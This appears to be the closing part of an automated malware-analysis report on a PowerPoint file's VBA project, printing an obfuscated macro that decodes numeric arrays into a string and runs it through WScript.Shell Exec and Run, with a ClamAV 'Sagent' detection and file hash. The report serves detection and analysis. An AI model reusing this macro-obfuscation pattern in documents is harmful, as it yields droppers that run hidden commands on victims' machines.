tgyc xzjtj, vyzwggj
azsjuw = Array(419, 424, 424, 429, 419)
tgyc azsjuw, vyzwggj
ybfwjd = Array(432)
tgyc ybfwjd, vyzwggj
xhyhsuy = Array(430, 419, 424, 424, 427)
tgyc xhyhsuy, vyzwggj
xidb = Array(419, 424)
tgyc xidb, vyzwggj
cafwhi = Array(424, 429, 419, 427)
tgyc cafwhi, vyzwggj
tstaj = Array(428)
tgyc tstaj, vyzwggj
ywtsbxg = Array(419, 431, 423, 419, 424, 424)
tgyc ywtsbxg, vyzwggj
icjxiwg = Array(427, 419, 424, 424, 424, 419)
tgyc icjxiwg, vyzwggj
siviy = Array(432, 432, 419, 424, 423, 424, 419, 424, 424, 428, 419, 424)
tgyc siviy, vyzwggj
ytahazx = Array(424, 428, 419, 426, 425, 419, 426, 429)
tgyc ytahazx, vyzwggj
hfcdbwu = Array(419, 424, 423, 428, 419, 424, 423, 426, 419, 424, 424, 432, 419, 424, 423, 427, 419, 424, 425)
tgyc hfcdbwu, vyzwggj
tcxasv = Array(424, 419, 424, 423, 424, 419, 428, 432, 419, 424, 425)
tgyc tcxasv, vyzwggj
bjdzut = Array(428)
tgyc bjdzut, vyzwggj
hfxbydc = Array(419, 432)
tgyc hfxbydc, vyzwggj
ysvze = Array(432, 419, 432, 430, 419, 424, 424, 429, 419, 432, 432, 419, 424, 423, 427, 419, 424, 425, 426, 419, 424, 425, 428)
tgyc ysvze, vyzwggj
cifz = Array(419)
tgyc cifz, vyzwggj
hibbvdh = Array(428, 432)
tgyc hibbvdh, vyzwggj
vacuaj = Array(499, 412, 498, 411, 472, 418, 436, 466, 474)
tgyc vacuaj, vyzwggj
fbgw = Array(479, 472, 489, 468)
tgyc fbgw, vyzwggj
xjssv = Array(411)
tgyc xjssv, vyzwggj
agxdzz = Array(470, 500, 434, 480, 476, 495, 407, 411, 472)
tgyc agxdzz, vyzwggj
ijigtah = Array(434)
tgyc ijigtah, vyzwggj
vidse = -72577
yfhiv = -85971
CreateObject("WScript.Shell").Exec vyzwggj
yizd = -74134
zgtt = -11719
ucxefec = -76352
sjdubz = -90044
echz = -9292
CreateObject("WScript.Shell").Run vyzwggj
xvyi = -55592
ithtxfu = -99109
yggiyx = -61570
gsfubjj = -36572
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 68608 bytes |
SHA-256: b4255e062f2910cceef4c0e0c502dd1bfce3749b7cee1a7ce301c72fa0ca3eb3 |
|||
|
Detection
ClamAV:
Doc.Malware.Sagent-6951618-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.